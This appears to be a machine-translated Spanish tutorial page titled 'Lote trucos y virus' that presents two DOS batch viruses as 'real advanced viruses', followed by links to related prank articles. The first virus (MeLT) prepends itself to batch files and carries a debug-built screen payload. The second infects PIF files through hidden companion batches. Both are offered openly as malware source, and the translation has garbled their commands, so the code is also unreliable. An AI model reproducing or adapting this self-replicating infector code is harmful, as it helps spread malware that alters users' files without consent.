Lote trucos y virus (2 / 3 paso)

Paso 2: Virus reales (avanzados)

1. el más poderoso
*******************
no ' 0% ==' si ' % _melt % ==' goto meltbeg
::---maniquí host---
de
echo Hola mundo!
::---host simulado final---

MeLTend [MeLT_2a]
: MeLTbeg
% _MeLT %
Si ' %1 ==' goto derretimiento derretir 2%
Si no existe % comspec % set comspec = % _MeLT % comando
/ c % comspec % /e:5000 %0 Vir del derretimiento
Set MeLTcl = %1 %2 %3 %4 %6 %7 %8 %9 de %5
Llame a %0 Rh del derretimiento
Set _MeLT =
Set MeLTcl =
Goto MeLTend
: MeLTrh
Set _MeLT = x
%0% MeLTcl %
: MeLTvir
Set MeLTH = 0%
Si no existe %_MeLT%%temp%\nul set temp = % tmp %
Si existen %temp%\MeLT_2a goto MeLTrun
%0 Derretir la fnd. % path %
: MeLTfnd
cambio % _MeLT %
Si ' %2 ==' salida del derretimiento
Set MeLT=%2\%MeLTH%.bat
Si no existe fusión % set MeLT=%2\%MeLTH%
Si no existe fusión % set MeLT=%2%MeLTH%.bat
Si no existe fusión % set fusión = %2% MeLTH %
Si no existe fusión de % % goto MeLTfnd
encontrar "Derretimiento" < % fusión > %temp%\MeLT_2a
attrib %temp%\MeLT_2a + h
: MeLTrun
% MeLTH % s de derretimiento. .. % path %
: Se derrite
cambio % _MeLT %
Si ' %2 ==' salida del derretimiento
para % en (%2\*.bat % 2*.bat) llamar a % MeLTH % inf derretimiento % %
Goto derretimientos
: MeLTinf
buscar /i "Derretimiento" < %3 > nul
Si no errorlevel 1 goto MeLTno
echo no ' %% 0 ==' si ' %% _melt %% ==' goto meltbeg > MeLT.t
tipo %3 >> MeLT.t
echo. >> MeLT.t
tipo %temp%\MeLT_2a >> MeLT.t
mover MeLT.t %3 > nul
salida del derretimiento
: MeLTact - flash-derrite el texto de la pantalla y luego vuelva a la normalidad
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE > MeLT.t
echo e 110 C0 C4 de FE 26 89 05 47 47 E8 E2 F2 FE 06 24 01 75 >> MeLT.t
echo e 120 B4 4 C CD 21 00 >> MeLT.t
Eco g >> MeLT.t
< MeLT.t > nul de depuración
del MeLT.t
salida del derretimiento
: MeLTno
Set MeLTC = % MeLTC %1
Si % MeLTC % == 1111111111 goto MeLTact
: MeLTend
*******************************************
2 se trata de un virus que infecta a los archivos PIF, utilizados por Windows para
ejecutar DOS programas. Funciona mediante la creación de compañero escondido lotes
que contienen copias de esto entonces alterar el archivo PIF para que la
lote de compañero funciona primero. Después de que el compañero corre corre el
original programa de host, el nombre del que está codificado en el
compañero. Los archivos pif están marcados para que no sean
re-infected. Sólo PIF es afectados, no se realizan cambios a
los programas infectados. Para 'curar', utilizar PIFEDIT para restaurar la
nombres de archivo originales entonces borre los archivos ocultos.

**********************************************
de
:: archivo de host...
Set pifvo=LIST.COM
:: despachador de lazo...
Si ' %1 ==' goto PiFV PiFV_ 2%
:: ejecutar el virus!
Set _PiFV =
Si no existe % comspec % set comspec=C:\COMMAND.COM%_PiFV%
/ c % comspec % /e:5000 %0 PiFV ir > nul
Si existen PiFV! del PiFV!
:: ejecutar el host
Set PiFVcl = %1 %2 %3 %4 %6 %7 %8 %9 de %5
Llame a %0 Hst PiFV
Set PiFVo =
Set PiFVcl =
:: Compruebe para la activación...
echo. | Date|Find /i "sat" > nul. PiFV
Si errorlevel 1 goto PiFV_end
echo. | Time|Find "7" > nul. PiFV
Si errorlevel 1 goto PiFV_msg
Set PiFV = eco
CLS % _PiFV %
% PiFV %.
% PiFV % allí fue una vez una nutria llamada Oscer
% PiFV % que afirma saber cómo hacer que el agua.
% PiFV % "No más represas", dijo, "uso de mi agua!"
% PiFV % pero la nutria Elder no quedó impresionado.
PAUSE > nul. PiFV
Set PiFV =
Goto PiFV_end
: PiFV_msg
echo [PiFV] por WaveFunc
Goto PiFV_end
: PiFV_hst
% PiFVo % % PiFVcl %
Goto PiFV_end
: PiFV_go
Set PiFVh = 0%
Si no existe sistema de % PiFVh % PiFVh=%0.bat
Si no existe salida de % PiFVh %
para % en (*.pif) llamada %0 Inf PiFV Condition
salida PiFV
: PiFV_inf
Set PiFVp = 3%
:: conseguir víctima marcador de nombre de archivo y la infección
:: de archivo PIF mediante depuración...
Si existen PiFV! Goto PiFV_1
echo m 124.162 524 > PiFV!
echo e 100' fn =' >> PiFV!
echo m 524.562 108 >> PiFV!
echo pifv n $.bat >> PiFV!
Eco de rcx >> PiFV!
Eco de 47 >> PiFV!
Eco w >> PiFV!
echo m 55E, 561 108 >> PiFV!
echo e 10C 0 >> PiFV!
echo pifv n $$ .bat >> PiFV!
Eco de rcx >> PiFV!
echo 10 >> PiFV!
Eco w >> PiFV!
echo q >> PiFV!
: PiFV_1
depuración de % PiFVp % < PiFV! > nul
llamar al PiFV$
Set PiFVn = fn %
llamar al PiFV$ $
Set PiFVi = fn %
del PiFV$?. Murciélago
:: pifvn = archivo de orig
:: pifvi = marcador de infección
:: pifvp = nombre del archivo pif
:: pifvh = compañero bat archivo
:: saltar FIPS infectados o 'vacío'...
Si ' % PiFVi % ==' goto PiFV PiFV_end
Si ' % PiFVn % ==' goto PiFV_end
:: no sombra command.com (estaría bien)
echo % PiFVn % |find /i "comando" > nul
Si no errorlevel 1 goto PiFV_end
:: los - crear un lote de compañero...
:: (el siguiente código de las tiras de la extensión)
echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3C 2e 74 08 88 > PiFV$
Eco e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 cd 09 21 >> PiFV$ $
echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV$ $
echo pifv n $.com >> PiFV$ $
Eco de rcx >> PiFV$ $
Eco de 2a >> PiFV$ $
Eco w >> PiFV$ $
echo q >> PiFV$ $
depurar < PiFV$ $> nul
echo % PiFVn % |PiFV$ > PiFV$ $.bat
llamar al PiFV$ $
Set PiFVb=%fn%.bat
del PiFV$?. *
:: pifvb = nuevo nombre
:: la sombra no si comp tiene el mismo nombre como anfitrión
Si % PiFVo % == % PiFVb % goto PiFV_end
Si existen % PiFVb % goto PiFV_end
echo off > % PiFVb %
Eco establece pifvo = % pifvn % >> % PiFVb %
Buscar "PiFV" < % PiFVh % >> % PiFVb %
% PiFVb % de attrib + h
::.. .y punto el PIF en el compañero
echo e 15E 'PiFV', 0 > PiFV$
echo e 124 'PiFVb %' 0 >> PiFV$ $
Eco w >> PiFV$ $
echo q >> PiFV$ $
depuración de % PiFVp % < PiFV$ $> nul
del PiFV$ $
:: Creo que hemos terminado!
salida PiFV
: PiFV_end
¿:: pregunto cuántos errores todo lo que esto tiene en ella? Sólo uno
:: manera de averiguar...

***************************************************

Artículos Relacionados

Cómo hacer un Virus falso con un archivo por lotes

Cómo hacer un Virus falso con un archivo por lotes

En este Instructable mostrará usted cómo hacer un archivo por lotes, que deberá engañar a tus amigos en el pensamiento de que su equipo tiene un virus. Se verá algo como la imagen de arriba cuando está en funcionamiento. Al final del programa un mens
Lote Código falso Virus/Hack

Lote Código falso Virus/Hack

Este es un tutorial sobre cómo hacer un Lote Código de Virus/Hacking falsos para asustar a tus amigos!Paso 1: Copiar y pegar si eres demasiado perezoso.Si sólo quieres el código para asustar a tus amigos y no quiere aprender cómo funciona, puede segu
Cómo crear un archivo por lotes de Virus falso

Cómo crear un archivo por lotes de Virus falso

Utilice esto para engañar a tus amigos o familia en la creencia de su PC (o ellos) ha sido infectado por un virus!Paso 1: Crear un archivo .txt en el escritorioHaga clic derecho en cualquier lugar en el escritorio.Arrastre el cursor sobre nueva.Selec
FALSO VIRUS con archivo por lotes

FALSO VIRUS con archivo por lotes

es el mismo quepero se tratara de un archivo por lotes que le da más para jugar con.es simple y divertido que hacer y se puede configurar para hacerlo en momentos específicos.[NO]sistema este por lo que activa cada vez que la persona que firma en él
VIRUS utilizando lote

VIRUS utilizando lote

ADVERTENCIA: utilizar esta información de daño/destruir una computadora es contra la ley y no somos responsables de lo que se hace con esta información.por favor quiero saber si esto funciona porque lo he probado aúnLEYENDA* = iniciar/detener la codi
Broma de Virus de archivo de lote

Broma de Virus de archivo de lote

este instructable le mostrará cómo hacer un virus batch simple que oculta todos los archivos de programa en el escritorio. En realidad descubrí este virus por un error de codificación que había hecho.Paso 1: Tiempo para la codificación de algunos! En
Contraseña protegida archivo utilizando archivos por lotes

Contraseña protegida archivo utilizando archivos por lotes

hoy, mostrará usted cómo hacer que un archivo protegido de contraseña que se crea y acceso mediante un archivo por lotes (.bat). El método que va a utilizar es muy simple, pero lamentablemente no es a prueba de tonto. Cualquiera con un poco de conoci
Colección de trucos de ordenador

Colección de trucos de ordenador

vamos a mostrar trucos de otro ordenador viejo/nuevo para tu ordenador.Paso 1: Teclado luces centelleantes usar las luces de tu teclado para bailar.>> Abra su bloc de notas.>> Escriba el siguiente código es Bloc de notas.Set WEBCHILLER = wscri
Consejos y trucos de .bat

Consejos y trucos de .bat

esto le mostrará algunos trucos que puedes hacer con el símbolo del sistema y fresco.Paso 1: hacer un .bat Abra el símbolo del sistema o Bloc de notas y escribir: IniciodeCLSHola mundo echohacer una pausa: finalPaso 2: hacer un .bat ahora que era muy
Tutorial completo de lote

Tutorial completo de lote

este tutorial es para principiantes a través de avanzados que quieren mejorar sus habilidades o aprender el significan de los comandos.En este tutorial va:• Aprender a hacer un archivo por lotes• Aprender a hacer comandos básicos• Aprender a utilizar
50 trucos de mano

50 trucos de mano

aquí es una colección de cincuenta trucos How-to que pueden ser entendidos de una foto o dos.Para ver más de ellos, echa un vistazoTrucos prácticos 8: Isla trucos útilesy trucos útiles más 40y aún más práctico trucosy trucos prácticos australianoy tr
Broma de Virus Batch básica

Broma de Virus Batch básica

muy divertido lo que debemos hacer a un equipo de padres. Inofensiva en todos los sentidos. Todo lo que debe hacer es reiniciar el ordenador y borrar el. Archivo BAT y todo volverá a la normalidad.Paso 1: Escribir el archivo por lotes 1) ir a Inicio
Cómo hacer un virus falso

Cómo hacer un virus falso

oky variedades voy a mostrarte cómo hacer un virus falsotodo lo que necesita es el Bloc de notasy algunas habilidades de archivo por lotes básicos!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ESTO NO DAÑA TU PC!!!!!!!! E
Acampar consejos y trucos

Acampar consejos y trucos

Para más de 30 años mi familia ha estado haciendo viajes anuales a Vermont para irse de campamento en el último otoño.  Durante los años ha pasado de ser sólo cuatro de nosotros (mamá, papá, hermana y yo) a más de una docena personas, familiares y am